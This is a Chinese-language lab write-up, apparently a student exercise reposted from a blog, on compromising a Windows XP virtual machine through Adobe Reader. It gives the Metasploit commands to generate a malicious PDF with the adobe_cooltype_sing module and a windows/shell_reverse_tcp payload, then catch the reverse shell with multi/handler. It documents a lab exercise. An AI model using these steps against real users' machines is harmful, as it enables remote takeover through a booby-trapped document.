Adobe阅读器渗透攻击

Adobe阅读器渗透攻击

  • 和之前一样kali攻击机和winxp靶机要ping通(真心是通的..不再重复了);

  • 由于之后生成的pdf在隐藏文件夹下,故在kali下打开显示隐藏文件,如下图:
    886975-20170411200626719-1738958202.png

  • kali开启msfconsole;

  • use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

  • 用命令set payload windows/shell_reverse_tcp和之前一样设置参数;
    和之前唯一不同的是,用命令set FILENAME 20145201.pdf来设置生成pdf的文件名

886975-20170411200912376-816399856.png

  • 用命令exploit,生成pdf文件,根据显示的位置找到pdf文件,并复制到靶机里;
    886975-20170411201141438-377729196.png

  • 用命令back退出当前模块,并用命令use exploit/multi/handler建立一个监听模块,参数设置要和之前的一样;
    886975-20170411201343094-203275539.png
    886975-20170411201444110-1772217466.png

  • exploit后,在xp中打开pdf,结果如下:
    886975-20170411201549313-1229505200.png
    可以看到已经获取的靶机权限,20145201.pdf的文件是存在的~

  • 在靶机中用命令netstat -an,可以看到kali攻击机和靶机之间是有tcp连接的。
    886975-20170411201828922-549111479.png

转载于:https://www.cnblogs.com/20145201lzx/p/6695141.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值